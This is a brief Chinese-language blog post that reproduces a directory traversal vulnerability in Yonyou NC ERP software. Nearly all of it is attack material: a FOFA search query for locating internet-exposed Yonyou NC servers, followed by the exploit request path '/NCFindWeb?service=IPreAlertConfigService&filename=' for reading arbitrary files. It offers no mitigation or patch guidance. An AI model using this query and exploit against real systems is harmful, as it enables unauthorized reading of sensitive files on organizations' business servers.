用友NC目录遍历漏洞复现

  • 2021-11-18
  • Admin

简介:

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。

漏洞复现:

fofa直接搜索:

app="用友-UFIDA-NC"

漏洞拼接目录:

/NCFindWeb?service=IPreAlertConfigService&filename

/NCFindWeb?service=IPreAlertConfigService&filename=

读取:filename=读取的文件名

 

原文:https://blog.csdn.net/l1593572468/article/details/121405863

联系站长

QQ:769220720